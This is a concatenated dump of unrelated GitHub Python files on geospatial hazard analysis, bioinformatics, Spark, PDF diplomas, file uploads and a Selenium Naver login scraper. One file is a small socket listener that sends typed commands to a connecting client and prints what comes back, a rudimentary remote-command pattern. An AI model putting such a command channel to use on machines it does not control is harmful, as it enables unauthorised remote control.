requirements\n-----------------------\n\n1. Correct paths to all files and correct input parameters\n\n2. Shapefiles of network-hazard intersections results with attributes:\n - edge_id or node_id - String/Integer/Float Edge ID or Node ID of network\n - length - Float length of edge intersecting with hazards\n - geometry - Shapely geometry of edges as LineString or nodes as Points\n\n3. Shapefile of administrative boundaries of Argentina with attributes:\n - province_i - String/Integer ID of Province\n - pro_name_e - String name of Province in English\n - district_i - String/Integer ID of District\n - dis_name_e - String name of District in English\n - commune_id - String/Integer ID of Commune\n - name_eng - String name of Commune in English\n - geometry - Shapely geometry of boundary Polygon\n\n4. Excel sheet of hazard attributes with attributes:\n - hazard_type - String name of hazard type\n - model - String name of hazard model\n - year - String name of hazard year\n - climate_scenario - String name of hazard scenario\n - probability - Float/String value of hazard probability\n - band_num - Integer value of hazard band\n - min_val - Integer value of minimum value of hazard threshold\n - max_val - Integer value of maximum value of hazard threshold\n\nResults\n-------\n\n1. Excel sheet of network-hazard-boundary intersection with attributes:\n - edge_id/node_id - String name of intersecting edge ID or node ID\n - length - Float length of intersection of edge LineString and hazard Polygon: Only for edges\n - province_id - String/Integer ID of Province\n - province_name - String name of Province in English\n - district_id - String/Integer ID of District\n - district_name - String name of District in English\n - commune_id - String/Integer ID of Commune\n - commune_name - String name of Commune in English\n - sector - String name of transport mode\n - hazard_type - String name of hazard type\n - model - String name of hazard model\n - year - String name of hazard year\n - climate_scenario - String name of hazard scenario\n - probability - Float/String value of hazard probability\n - band_num - Integer value of hazard band\n - min_val - Integer value of minimum value of hazard threshold\n - max_val - Integer value of maximum value of hazard threshold\n\n\"\"\"\nimport itertools\nimport os\nimport sys\n\nimport geopandas as gpd\nimport pandas as pd\nfrom shapely.geometry import Polygon\nfrom tqdm import tqdm\n\n\ndef line_length(line, ellipsoid=\"WGS-84\"):\n \"\"\"Length of a line in meters, given in geographic coordinates.\n\n Adapted from https://gis.stackexchange.com/questions/4022/looking-for-a-pythonic-way-to-calculate-the-length-of-a-wkt-linestring#answer-115285\n\n Args:\n line: a shapely LineString object with WGS-84 coordinates.\n\n ellipsoid: string name of an ellipsoid that `geopy` understands (see http://geopy.readthedocs.io/en/latest/#module-geopy.distance).\n\n Returns:\n Length of line in kilometers.\n \"\"\"\n if line.geometryType() == \"MultiLineString\":\n return sum(line_length(segment) for segment in line)\n\n return sum(\n vincenty(\n tuple(reversed(a)), tuple(reversed(b)), ellipsoid=ellipsoid\n ).kilometers\n for a, b in pairwise(line.coords)\n )\n\n\ndef spatial_scenario_selection(\n network_shapefile,\n polygon_dataframe,\n hazard_dictionary,\n data_dictionary,\n network_id_column,\n network_type=\"nodes\",\n):\n \"\"\"Intersect network edges/nodes and boundary Polygons to collect boundary and hazard attributes\n\n Parameters\n - network_shapefile - Shapefile of edge LineStrings or node Points\n - polygon_shapefile - Shapefile of boundary Polygons\n - hazard_dictionary - Dictionary of hazard attributes\n - data_dictionary - Dictionary of network-hazard-boundary intersection attributes\n - network_type - String value -'edges' or 'nodes' - Default = 'nodes'\n - name_province - String name of province if needed - Default = ''\n\n Outputs\n data_dictionary - Dictionary of network-hazard-boundary intersection attributes:\n - edge_id/node_id - String name of intersecting edge ID or node ID\n - length - Float length of intersection of edge LineString and hazard Polygon: Only for edges\n - province_id - String/Integer ID of Province\n - province_name - String name of Province in English\n - district_id - String/Integer ID of District\n - district_name - String name of District in English\n - commune_id - String/Integer ID of Commune\n - commune_name - String name of Commune in English\n - hazard_attributes - Dictionary of all attributes from hazard dictionary\n \"\"\"\n line_gpd = gpd.read_file(network_shapefile)\n poly_gpd = polygon_dataframe\n\n if len(line_gpd.index) > 0 and len(poly_gpd.index) > 0:\n print(network_shapefile, len(line_gpd.index), len(poly_gpd.index))\n line_gpd.columns = map(str.lower, line_gpd.columns)\n poly_gpd.columns = map(str.lower, poly_gpd.columns)\n\n # create spatial index\n poly_sindex = poly_gpd.sindex\n\n poly_sindex = poly_gpd.sindex\n for l_index, lines in line_gpd.iterrows():\n intersected_polys = poly_gpd.iloc[\n list(poly_sindex.intersection(lines.geometry.bounds))\n ]\n for p_index, poly in intersected_polys.iterrows():\n if (\n (lines[\"geometry\"].intersects(poly[\"geometry\"]) is True)\n and (poly.geometry.is_valid is True)\n and (lines.geometry.is_valid is True)\n ):\n if network_type == \"edges\":\n value_dictionary = {\n network_id_column: lines[network_id_column],\n \"length\": 1000.0\n * line_length(\n lines[\"geometry\"].intersection(\n poly[\"geometry\"]\n )\n ),\n \"province_id\": poly[\"province_id\"],\n \"province_name\": poly[\"province_name\"],\n \"department_id\": poly[\"department_id\"],\n \"department_name\": poly[\"department_name\"],\n }\n elif network_type == \"nodes\":\n value_dictionary = {\n network_id_column: lines[network_id_column],\n \"province_id\": poly[\"province_id\"],\n \"province_name\": poly[\"province_name\"],\n \"department_id\": poly[\"department_id\"],\n \"department_name\": poly[\"department_name\"],\n }\n\n data_dictionary.append(\n {**value_dictionary, **hazard_dictionary}\n )\n\n del line_gpd, poly_gpd\n return data_dictionary\n\n\ndef create_hazard_attributes_for_network(\n intersection_dir,\n climate_scenario,\n year,\n sector,\n hazard_files,\n hazard_df,\n thresholds,\n commune_shape,\n network_id_column,\n network_type=\"\",\n):\n \"\"\"Extract results of network edges/nodes and hazard intersections to collect\n network-hazard intersection attributes\n\n - Combine with boundary Polygons to collect network-hazard-boundary intersection attributes\n - Write final results to an Excel sheet\n\n Parameters\n ----------\n intersection_dir : str\n Path to Directory where the network-hazard shapefile results are stored\n sector : str\n name of transport mode\n hazard_files : list[str]\n names of all hazard files\n hazard_df : pandas.DataFrame\n hazard attributes\n bands : list[int]\n integer values of hazard bands\n thresholds : list[int]\n integer values of hazard thresholds\n commune_shape\n Shapefile of commune boundaries and attributes\n network_type : str, optional\n value -'edges' or 'nodes': Default = 'nodes'\n name_province : str, optional\n name of province if needed: Default = ''\n\n Returns\n -------\n data_df : pandas.DataFrame\n network-hazard-boundary intersection attributes:\n - edge_id/node_id - String name of intersecting edge ID or node ID\n - length - Float length of intersection of edge LineString and hazard Polygon: Only for edges\n - province_id - String/Integer ID of Province\n - province_name - String name of Province in English\n - district_id - String/Integer ID of District\n - district_name - String name of District in English\n - commune_id - String/Integer ID of Commune\n - commune_name - String name of Commune in English\n - sector - String name of transport mode\n - hazard_type - String name of hazard type\n - model - String name of hazard model\n - year - String name of hazard year\n - climate_scenario - String name of hazard scenario\n - probability - Float/String value of hazard probability\n - band_num - Integer value of hazard band\n - min_val - Integer value of minimum value of hazard threshold\n - max_val - Integer value of maximum value of hazard threshold\n - length - Float length of intersection of edge LineString and hazard Polygon: Only for edges\n\n \"\"\"\n data_dict = []\n for root, dirs, files in os.walk(intersection_dir):\n for file in files:\n if file.endswith(\".shp\"):\n hazard_dict = {}\n hazard_dict[\"sector\"] = sector\n hazard_shp = os.path.join(root, file)\n hz_file = file.split(\"_\")\n hz_file = [\n hz_file[h - 1] + \"_\" + hz_file[h]\n for h in range(len(hz_file))\n if \"1in\" in hz_file[h]\n ][0]\n hazard_dict[\"hazard_type\"] = hazard_df.loc[\n hazard_df.file_name == hz_file\n ].hazard_type.values[0]\n hazard_dict[\"model\"] = hazard_df.loc[\n hazard_df.file_name == hz_file\n ].model.values[0]\n hazard_dict[\"year\"] = hazard_df.loc[\n hazard_df.file_name == hz_file\n ].year.values[0]\n hazard_dict[\"climate_scenario\"] = hazard_df.loc[\n hazard_df.file_name == hz_file\n ].climate_scenario.values[0]\n hazard_dict[\"probability\"] = hazard_df.loc[\n hazard_df.file_name == hz_file\n ].probability.values[0]\n\n hazard_thrs = [\n (thresholds[t], thresholds[t + 1])\n for t in range(len(thresholds) - 1)\n if \"{0}-{1}\".format(thresholds[t], thresholds[t + 1])\n in file\n ][0]\n hazard_dict[\"min_depth\"] = hazard_thrs[0]\n hazard_dict[\"max_depth\"] = hazard_thrs[1]\n\n data_dict = spatial_scenario_selection(\n hazard_shp,\n commune_shape,\n hazard_dict,\n data_dict,\n network_id_column,\n network_type=network_type,\n )\n\n print(\"Done with file\", file)\n\n data_df = pd.DataFrame(data_dict)\n data_df_cols = data_df.columns.values.tolist()\n if \"length\" in data_df_cols:\n selected_cols = [cols for cols in data_df_cols if cols != \"length\"]\n data_df = data_df.groupby(selected_cols)[\"length\"].sum().reset_index()\n\n return data_df\n\n\ndef main():\n \"\"\"Collect results\n\n 1. Specify the paths from where you to read and write:\n - Input data\n - Intermediate calcuations data\n - Output results\n\n 2. Supply input data and parameters\n - Names of the three Provinces - List of string types\n - Names of modes - List of strings\n - Names of output modes - List of strings\n - Names of hazard bands - List of integers\n - Names of hazard thresholds - List of integers\n - Condition 'Yes' or 'No' is the users wants to process results\n\n 3. Give the paths to the input data files:\n - Commune boundary and stats data shapefile\n - Hazard datasets description Excel file\n - String name of sheet in hazard datasets description Excel file\n \"\"\"\n tqdm.pandas()\n incoming_data_path = \"path/to/project/inputdata/\"\n data_path = \"path/to/project/inputdata/\"\n output_path = \"path/to/project/outputdata/\"\n\n # Supply input data and parameters\n modes = [\n \"road\",\n \"rail\",\n \"bridge\",\n \"air\",\n \"port\",\n ] # change this to your network datasets\n modes_shapefile_names = [\n \"road_edges\",\n \"rail_edges\",\n \"bridge_edges\",\n \"air_nodes\",\n \"port_nodes\",\n ] # change this to your network datasets\n point_asset_modes = [\n \"air\",\n \"port\",\n ] # change this to your network point asset datasets\n line_asset_modes = [\n \"road\",\n \"rail\",\n \"bridge\",\n ] # change this to your network line asset datasets\n modes_id_cols = [\n \"edge_id\",\n \"edge_id\",\n \"bridge_id\",\n \"node_id\",\n \"node_id\",\n ] # This should match the ID column name in your network datasets\n climate_scenarios = [\n \"historical\",\n \"rcp4p5\",\n \"rcp8p5\",\n ] # change this to GLOFRIS scenarios\n\n # We assume here that we will extract only flood outlines with depth:\n # 50cm-1m\n # 1m-2m\n # 2m-3m\n # 3m-4m\n # 4m-999m (>4m)\n # You can change this if you want to get different flood depth bands and ranges\n # Change the values in the thresholds and thresholds_label accordingly\n thresholds = [\"50cm\", \"1m\", \"2m\", \"3m\", \"4m\", \"999m\"]\n\n # Give the paths to the input data files\n # load provinces and get geometry of the right province\n print(\"* Reading provinces dataframe\")\n # change this to the name of the province shapefile for China\n province_path = os.path.join(\n incoming_data_path,\n \"admin_boundaries_and_census\",\n \"province\",\n \"province.shp\",\n )\n provinces = gpd.read_file(province_path, encoding=\"utf-8\")\n provinces = provinces.to_crs({\"init\": \"epsg:4326\"})\n # The file should have a column named 'province_id' and a column named 'province_name'\n # If these columns are given some other name then rename them as per the next line below\n # provinces.rename(columns={'OBJECTID':'province_id','nombre':'province_name'},inplace=True)\n sindex_provinces = provinces.sindex\n\n \"\"\"Assign provinces to zones\n \"\"\"\n print(\"* Reading department dataframe\")\n # change this to the name of the department shapefile for China\n # If you do not have a department level admin then skip this\n zones_path = os.path.join(\n incoming_data_path,\n \"admin_boundaries_and_census\",\n \"departaments\",\n \"Departaments.shp\",\n )\n zones = gpd.read_file(zones_path, encoding=\"utf-8\")\n zones = zones.to_crs({\"init\": \"epsg:4326\"})\n # The file should have a column named 'department_id' and a column named 'department_name'\n # If these columns are given some other name then rename them as per the next line below\n # zones.rename(columns={'OBJECTID':'department_id','Name':'department_name'},inplace=True)\n\n zones[\"geometry_centroid\"] = zones.geometry.centroid\n zones_centriods = zones[\n [\"department_id\", \"department_name\", \"geometry_centroid\"]\n ]\n zones_centriods.rename(\n columns={\"geometry_centroid\": \"geometry\"}, inplace=True\n )\n zone_matches = gpd.sjoin(\n zones_centriods,\n provinces[[\"province_id\", \"province_name\", \"geometry\"]],\n how=\"inner\",\n op=\"within\",\n ).reset_index()\n no_zones = [\n x\n for x in zones[\"department_id\"].tolist()\n if x not in zone_matches[\"department_id\"].tolist()\n ]\n\n zones.drop(\"geometry_centroid\", axis=1, inplace=True)\n if no_zones:\n remain_zones = zones[zones[\"department_id\"].isin(no_zones)]\n remain_zones[\"province_name\"] = remain_zones.progress_apply(\n lambda x: extract_value_from_gdf(\n x, sindex_provinces, provinces, \"province_name\"\n ),\n axis=1,\n )\n remain_zones[\"province_id\"] = remain_zones.progress_apply(\n lambda x: extract_value_from_gdf(\n x, sindex_provinces, provinces, \"province_id\"\n ),\n axis=1,\n )\n\n zone_matches = pd.concat(\n [zone_matches, remain_zones],\n axis=0,\n sort=\"False\",\n ignore_index=True,\n )\n\n zones = pd.merge(\n zones,\n zone_matches[[\"department_id\", \"province_id\", \"province_name\"]],\n how=\"left\",\n on=[\"department_id\"],\n )\n\n hazard_description_file = os.path.join(\n data_path, \"flood_data\", \"GLOFRIS\", \"glofris_files.csv\"\n ) # change this to the GLOFRIS data path and the csv file describing the data\n\n # Specify the output files and paths to be created\n output_dir = os.path.join(output_path, \"hazard_scenarios\")\n if os.path.exists(output_dir) == False:\n os.mkdir(output_dir)\n\n # Read hazard datasets desciptions\n print(\"* Reading hazard datasets desciptions\")\n hazard_df = pd.read_csv(hazard_description_file)\n hazard_files = hazard_df[\"file_name\"].values.tolist()\n\n # Process national scale results\n print(\"* Processing national scale results\")\n for m in range(len(modes)):\n mode_data_df = []\n for cl_sc in range(len(climate_scenarios)):\n intersection_dir = os.path.join(\n output_path,\n \"networks_hazards_intersection_shapefiles\",\n \"{}_hazard_intersections\".format(modes[m]),\n climate_scenarios[cl_sc],\n )\n\n if modes[m] in [\"road\", \"rail\", \"bridge\"]:\n ntype = \"edges\"\n else:\n ntype = \"nodes\"\n data_df = create_hazard_attributes_for_network(\n intersection_dir,\n climate_scenarios[cl_sc],\n years[cl_sc],\n modes[m],\n hazard_files,\n hazard_df,\n thresholds,\n zones,\n modes_id_cols[m],\n network_type=ntype,\n )\n\n mode_data_df.append(data_df)\n del data_df\n\n mode_data_df = pd.concat(\n mode_data_df, axis=0, sort=\"False\", ignore_index=True\n )\n data_path = os.path.join(\n output_dir, \"{}_hazard_intersections.csv\".format(modes[m])\n )\n mode_data_df.to_csv(data_path, index=False, encoding=\"utf-8\")\n del mode_data_df\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"nismod/snail","sub_path":"scripts/network_hazard_intersections/hazards_network_intersections_results_collect.py","file_name":"hazards_network_intersections_results_collect.py","file_ext":"py","file_size_in_byte":19444,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"53"} +{"seq_id":"38717580263","text":"from Bio import SeqIO\nimport os\nimport gzip\n\nclass ReadFa:\n\n\tdef __init__(self, fastq):\n\t\tself.fastq = fastq\n\n\n\tdef fa_check(self):\n\t\t# name_tuple = os.path.splitext(os.path.basename(self.bam))\n\t\tif os.path.exists(self.fastq):\n\t\t\tname_tuple = os.path.splitext(os.path.basename(self.fastq))\n\t\t\tif name_tuple[1].lower() is \"fasta\":\n\t\t\t\tprint(\"file is a FASTA file!\")\n\t\t\t\treturn False\n\t\t\telif name_tuple[1].lower() is \"fastq\":\n\t\t\t\tprint(\"file is a FASTQ file!\")\n\t\t\t\treturn True\n\t\t\telse:\n\t\t\t\tprint(\"Unknown file extension!!\")\n\t\t\t\texit()\n\t\telse:\n\t\t\tprint(\"BAM file was not found!\")\n\t\t\treturn False\n\n\t\n\tdef count_reads(self):\n\t\ttemp = []\t\n\t\tfile = gzip.open(self.fastq,\"rt\")\n\t\tfor s in SeqIO.parse(file, \"fastq\"):\n\t\t\ttemp.append(s.id)\n\t\treturn len(temp)\n","repo_name":"kumarsaurabh20/Stinkbug_v2.0_popgenome","sub_path":"all_scripts/readFa.py","file_name":"readFa.py","file_ext":"py","file_size_in_byte":748,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"23664020156","text":"from pyspark import SparkConf, SparkContext\r\nimport collections\r\n\r\n# Configurations on Spark\r\nconf = SparkConf().setMaster(\"local\").setAppName(\"RatingsHistogram\")\r\nsc = SparkContext(conf = conf)\r\n\r\nlines = sc.textFile(\"file:///SparkCourse/ml-100k/u.data\")\r\n# Parse the data into different fields\r\nratings = lines.map(lambda x: x.split()[2])\r\n\r\n# Run some functions on the ratings\r\nresult = ratings.countByValue()\r\nsortedResults = collections.OrderedDict(sorted(result.items()))\r\nfor key, value in sortedResults.items():\r\n print(\"%s %i\" % (key, value))\r\n","repo_name":"CharlizeY/SparkCourse","sub_path":"ratings-counter.py","file_name":"ratings-counter.py","file_ext":"py","file_size_in_byte":556,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38327371553","text":"import random\n\ndef generator(text, sep, opt=None):\n\tif not isinstance(text, str) or not isinstance(sep, str):\n\t\tprint('ERROR')\n\t\treturn False\n\tstrings = text.split(sep)\n\tif opt == 'shuffle':\n\t\tfor i in range(len(strings) - 1):\n\t\t\tj = random.randint(0, i + 1)\n\t\t\tstrings[i], strings[j] = strings[j], strings[i]\n\t\tprint(strings)\n\telif opt == 'unique':\n\t\tstrings_set = set(strings)\n\t\tstrings = (list(strings_set))\n\t\tprint(strings)\n\telif opt == 'ordered':\n\t\tstrings.sort()\n\telse:\n\t\tprint('ERROR')\n\t\treturn False\n\treturn strings\n\n\n# lst = generator(\"esto es es es una prueba una\", ' ', 'unique')","repo_name":"paudpr/Quantum-IBM","sub_path":"42AI_python/module01/ex03/generator.py","file_name":"generator.py","file_ext":"py","file_size_in_byte":593,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26155360902","text":"#!/bin/bash\r\nimport socket\r\n\r\n\r\nif __name__ == '__main__':\r\n\r\n # TCP server basato su IPv4 \r\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n port_number = 8081\r\n\r\n # Associa l'indirizzo IP e il numero di porta\r\n s.bind((socket.gethostname(),port_number)) \r\n\r\n # il numero di porta può essere compreso tra 0-65535 (di solito le porte non privilegiate sono > 1023)\r\n\r\n s.listen(port_number)\r\n print(f'lisening portnumber {port_number} ...')\r\n while True:\r\n clt, adr = s.accept()\r\n\r\n cmd = input(':> ')\r\n\r\n s.send(bytes( cmd ,\"utf-8\"))\r\n print(f'sending command: {cmd}')\r\n\r\n data = s.recv(2048)\r\n if data:\r\n print('data recived:\\n\\t {data}')\r\n","repo_name":"erma0x/Servers-n-Clients","sub_path":"server1.py","file_name":"server1.py","file_ext":"py","file_size_in_byte":739,"program_lang":"python","lang":"it","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"10697329699","text":"import os\n\nfrom flask import url_for\nfrom werkzeug.utils import secure_filename\n\nfrom common import UPLOAD_PATH, ALLOWED_EXTENSIONS_IMAGES, SERVICE_URL\n\n\ndef allowed_file(filename, whitelist):\n return '.' in filename and filename.rsplit('.', 1)[1] in whitelist\n\n\ndef upload_file(file, path, filename=None):\n if not filename:\n filename = file.filename\n if file and allowed_file(filename, ALLOWED_EXTENSIONS_IMAGES):\n filename = secure_filename(filename)\n file.save(os.path.join(path, filename))\n return f'{SERVICE_URL}/{path}/{filename}'\n else:\n return False\n","repo_name":"Funge-NFT-minting-guide/funge-api","sub_path":"util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":605,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34519415561","text":"import datetime\nfrom unittest.mock import MagicMock\n\n\ndef test_schedule_emits_event(event_manager, schedule, patch_datetime_now):\n \"\"\"\n GIVEN an EventManager\n AND a callback is registered for the EVENT_EXECUTE event\n AND a Schedule that has been populated\n AND the current time is the next scheduled time\n WHEN update is called on the Schedule\n THEN the callback is called\n \"\"\"\n callback = MagicMock()\n event_manager.subscribe(schedule.EVENT_EXECUTE, callback)\n patch_datetime_now.set_now(schedule.next_time())\n schedule.update(event_manager)\n callback.assert_called_once()\n","repo_name":"brian-fouts/catfeeder","sub_path":"tests/integration/schedule/test_schedule_event.py","file_name":"test_schedule_event.py","file_ext":"py","file_size_in_byte":625,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18248358763","text":"# from PyPDF2 import PdfFileWriter, PdfFileReader\n\nimport os\nimport json\n\nfrom reportlab.pdfgen import canvas\nfrom reportlab.pdfbase import pdfmetrics, ttfonts\nfrom reportlab.lib.pagesizes import A4\n\nimport unicodedata\n\nCENTER = A4[0]/2\n\nFILE_TEMPLATE = 'dist/diplom-%s.pdf'\n\nFONT_TITLE = ('OpenSans-Bold', 60)\nFONT_FESTIVAL_NAME = ('OpenSans-Bold', 45)\nFONT_PARTICIPANT_NAME = ('OpenSans-Bold', 30)\nFONT_REGULAR = ('OpenSans-Semibold', 18)\nFONT_SUBTITLE = ('OpenSans-Regular', 12)\nFONT_WORKSHOP = ('OpenSans-Bold', 24)\n\nTEXT_TITLE = ('DIPLOM', FONT_TITLE, None, A4[1] - 170)\nTEXT_FESTIVAL = ('Improtřesk 2017', FONT_FESTIVAL_NAME, None, A4[1] - 460)\nTEXT_PRESIDENT = ('Vanda Gabrielová', FONT_REGULAR, A4[0] - 50, 90, 'right')\n\nTEXT = [\n ('Česká improvizační liga', None, None, A4[1] - 100),\n TEXT_TITLE,\n ('za absolvování workshopu', None, None, A4[1] - 300),\n ('v rámci festivalu', None, None, A4[1] - 395),\n TEXT_FESTIVAL,\n TEXT_PRESIDENT,\n ('Prezidentka Improligy', FONT_SUBTITLE, A4[0] - 50, 70, 'right'),\n ('V roli lektora', FONT_SUBTITLE, A4[0] - 50, 180, 'right'),\n]\n\n\ndef strip_accents(s):\n return ''.join(c for c in unicodedata.normalize('NFD', s)\n if unicodedata.category(c) != 'Mn')\n\n\ndef get_all_texts(participant_name, workshop_name, lector_name):\n return TEXT + [\n (participant_name, FONT_PARTICIPANT_NAME, None, A4[1] - 250),\n (workshop_name, FONT_WORKSHOP, None, A4[1] - 350),\n (lector_name, FONT_REGULAR, A4[0] - 50, 200, 'right'),\n ]\n\n\ndef render_text(can, text, font=None, xarg=None, yarg=None, align='center'):\n if not font:\n font = FONT_REGULAR\n\n if not xarg:\n xarg = CENTER\n\n can.setFont(*font)\n\n if align == 'center':\n return can.drawCentredString(xarg, yarg, text)\n elif align == 'right':\n return can.drawRightString(xarg, yarg, text)\n return can.drawString(xarg, yarg, text)\n\n\ndef render_texts(can, texts):\n for text in texts:\n render_text(can, *text)\n\n\ndef generate_diploma(\n can,\n participant_name,\n workshop_name,\n lector_name,\n):\n can.setStrokeColorRGB(0.258, 0.258, 0.227)\n can.setFillColorRGB(0.258, 0.258, 0.227)\n can.setFont('OpenSans-Semibold', 24)\n can.drawImage(\n 'bg.jpg',\n 0,\n 0,\n A4[0],\n A4[1],\n None,\n True,\n 'c',\n )\n\n texts = get_all_texts(\n participant_name,\n workshop_name,\n lector_name,\n )\n render_texts(can, texts)\n\n title_width = can.stringWidth(TEXT_TITLE[0], *TEXT_TITLE[1]) - 10\n president_width = max(150, can.stringWidth(\n TEXT_PRESIDENT[0],\n *TEXT_PRESIDENT[1],\n ))\n text_lector = texts[-1]\n lector_width = max(150, can.stringWidth(text_lector[0], *text_lector[1]))\n top_border_top = A4[1] - 45\n\n can.setStrokeColorRGB(0.8, 0.8, 0.72)\n can.line(\n 60,\n top_border_top - 4,\n A4[0] - 60,\n top_border_top - 4,\n )\n\n can.setStrokeColorRGB(0.4, 0.4, 0.32)\n can.line(\n 60,\n top_border_top,\n A4[0] - 60,\n top_border_top,\n )\n\n title_line_top = TEXT_TITLE[3] - 31\n can.line(\n CENTER - title_width/2,\n title_line_top,\n CENTER + title_width/2,\n title_line_top,\n )\n\n festival_line_top = TEXT_FESTIVAL[3] - 39\n can.line(\n CENTER - title_width/2,\n festival_line_top,\n CENTER + title_width/2,\n festival_line_top,\n )\n\n president_line_top = TEXT_PRESIDENT[3] + 30\n can.line(\n TEXT_PRESIDENT[2] - president_width,\n president_line_top,\n TEXT_PRESIDENT[2],\n president_line_top,\n )\n\n lector_line_top = text_lector[3] + 30\n can.line(\n text_lector[2] - lector_width,\n lector_line_top,\n text_lector[2],\n lector_line_top,\n )\n\n if not participant_name and not workshop_name and not lector_name:\n empty_participant_line_start = CENTER - 130\n empty_participant_line_end = CENTER + 130\n empty_workshop_line_start = CENTER - 180\n empty_workshop_line_end = CENTER + 180\n\n can.setStrokeColorRGB(0.9, 0.9, 0.9)\n can.line(\n empty_participant_line_start,\n A4[1] - 262,\n empty_participant_line_end,\n A4[1] - 262,\n )\n can.line(\n empty_workshop_line_start,\n A4[1] - 362,\n empty_workshop_line_end,\n A4[1] - 362,\n )\n\n\npdfmetrics.registerFont(ttfonts.TTFont(\n 'OpenSans-Regular',\n './OpenSans-Regular.ttf',\n))\npdfmetrics.registerFont(ttfonts.TTFont(\n 'OpenSans-Semibold',\n './OpenSans-Semibold.ttf',\n))\npdfmetrics.registerFont(ttfonts.TTFont(\n 'OpenSans-Bold',\n './OpenSans-Bold.ttf',\n))\npdfmetrics.registerFont(ttfonts.TTFont(\n 'OpenSans-ExtraBold',\n './OpenSans-ExtraBold.ttf',\n))\n\n\ndef generate_set(data_src, dest_dir):\n with open(data_src) as json_data:\n data = json.load(json_data)\n\n if not os.path.exists(dest_dir):\n os.makedirs(dest_dir)\n\n file_name = os.path.splitext(os.path.basename(data_src))[0]\n print(':: Generating workshop %s' % file_name)\n dest_path = os.path.join(dest_dir, '%s.pdf' % file_name)\n can = canvas.Canvas(dest_path, pagesize=A4)\n\n for dato in data:\n print(\"Generating diploma for %s\" % dato.get(\n 'participant_name',\n 'Anonymous',\n ))\n generate_diploma(\n can,\n dato['participant_name'],\n dato['workshop_name'],\n dato['lector_name'],\n )\n can.showPage()\n\n can.save()\n\n\ndata_dir = 'data'\ndata_files = []\n\nfor f in os.listdir(data_dir):\n file_path = os.path.join(data_dir, f)\n if os.path.isfile(file_path):\n data_files.append(file_path)\n\n\nfor file_name in data_files:\n generate_set(file_name, 'dist')\n print('-----------')\n","repo_name":"just-paja/improtresk-diploma","sub_path":"generate.py","file_name":"generate.py","file_ext":"py","file_size_in_byte":5899,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"6054933085","text":"def hansu(num):\n cnt = 0\n for i in range(1, num+1):\n if i < 100:\n cnt += 1\n else:\n arr = list(map(int, str(i)))\n if arr[0] - arr[1] == arr[1] - arr[2]:\n cnt +=1\n return cnt\n\nprint(hansu(int(input())))","repo_name":"jw3419/Problem_Bank","sub_path":"6_FUNCTION_problem/3.py","file_name":"3.py","file_ext":"py","file_size_in_byte":271,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5687258499","text":"# -*- coding: utf-8 -*-\n\nimport logging\nimport logging.handlers\nimport json\nimport getpass\nimport time\nimport datetime as dt\nimport pandas as pd\n\nfrom selenium import webdriver\nfrom selenium.webdriver.firefox.options import Options\nfrom bs4 import BeautifulSoup\n\n\nlogger = logging.getLogger('scraping_main')\nlogger.setLevel(logging.DEBUG)\n\n# create file handler which logs even debug messages\nfh = logging.handlers.RotatingFileHandler('scraping_main.log', maxBytes=104857, backupCount=3)\nfh.setLevel(logging.DEBUG)\n\n# create console handler with a higher log level\nch = logging.StreamHandler()\nch.setLevel(logging.INFO)\n\n# create formatter and add it to the handlers\nformatter = logging.Formatter('%(asctime)s [%(levelname)s] %(name)s %(message)s')\nfh.setFormatter(formatter)\nch.setFormatter(formatter)\n\n# add the handler to logger\nlogger.addHandler(fh)\nlogger.addHandler(ch)\n\nnow_dt = dt.datetime.now()\n\n\ndef selenium_naver_login(naver_id, naver_pw):\n options = Options()\n options.headless = True\n driver = webdriver.Firefox(options=options)\n driver.implicitly_wait(5)\n\n # 로그인 전용 화면\n # driver.get('https://nid.naver.com/nidlogin.login?svctype=262144&url=http://m.naver.com/aside/')\n naver_url = \"http://naver.com\"\n driver.get(naver_url)\n # # 아이디와 비밀번호 입력\n # driver.find_element_by_name('id').send_keys('ggtt7')\n # driver.find_element_by_name('pw').send_keys(pword)\n # # 로그인 버튼 클릭\n # driver.find_element_by_css_selector('#frmNIDLogin > fieldset > input').click()\n login_button = driver.find_element_by_css_selector(\".link_login\")\n login_button.click()\n\n # 아이디와 비밀번호 입력\n driver.execute_script(f\"document.getElementsByName('id')[0].value='{naver_id}'\")\n driver.execute_script(f\"document.getElementsByName('pw')[0].value='{naver_pw}'\")\n # 로그인 버튼 클릭\n driver.find_element_by_css_selector(\"#frmNIDLogin > fieldset > input\").click()\n\n time.sleep(3)\n return driver\n\n\ndef scraping_board_list(driver, startdate=now_dt, enddate=now_dt, max_page_num=100):\n # target_date = '20.01.03'\n target_date = startdate.strftime(\"%y.%m.%d\")\n logger.info('target_date: %s' % target_date)\n base_url = 'https://m.cafe.naver.com/ca-fe/web/cafes/29798500/menus/29'\n\n driver.get(base_url)\n # driver.switch_to_frame('cafe_main')\n for page_num in range(1, max_page_num):\n # 더보기 버튼 50번 클릭\n # driver.find_element_by_xpath('//*[@id=\"btnNextList\"]/a').click()\n driver.find_element_by_css_selector('.u_cbox_btn_more').click()\n # 로딩 시간이 있으므로 타이밍 맞추기 위해 sleep(0.5)\n time.sleep(0.5)\n article_list = driver.find_elements_by_class_name('board_box ')\n article_item = article_list[-1]\n tag_list = article_item.find_elements_by_tag_name('a')\n article_item_tag1 = tag_list[0] # 타이틀 바\n user_area = article_item_tag1.find_element_by_class_name('user_area')\n time_text = user_area.find_element_by_class_name('time').text\n if time_text < target_date and len(time_text) > 6:\n break\n\n # href 속성을 찾아 url을 리스트로 저장\n article_list = driver.find_elements_by_class_name('board_box ')\n article_urls = list()\n\n for i in range(len(article_list)):\n article_item = article_list[i]\n tag_list = article_item.find_elements_by_tag_name('a')\n article_item_tag1 = tag_list[0] # 타이틀 바\n href_url = 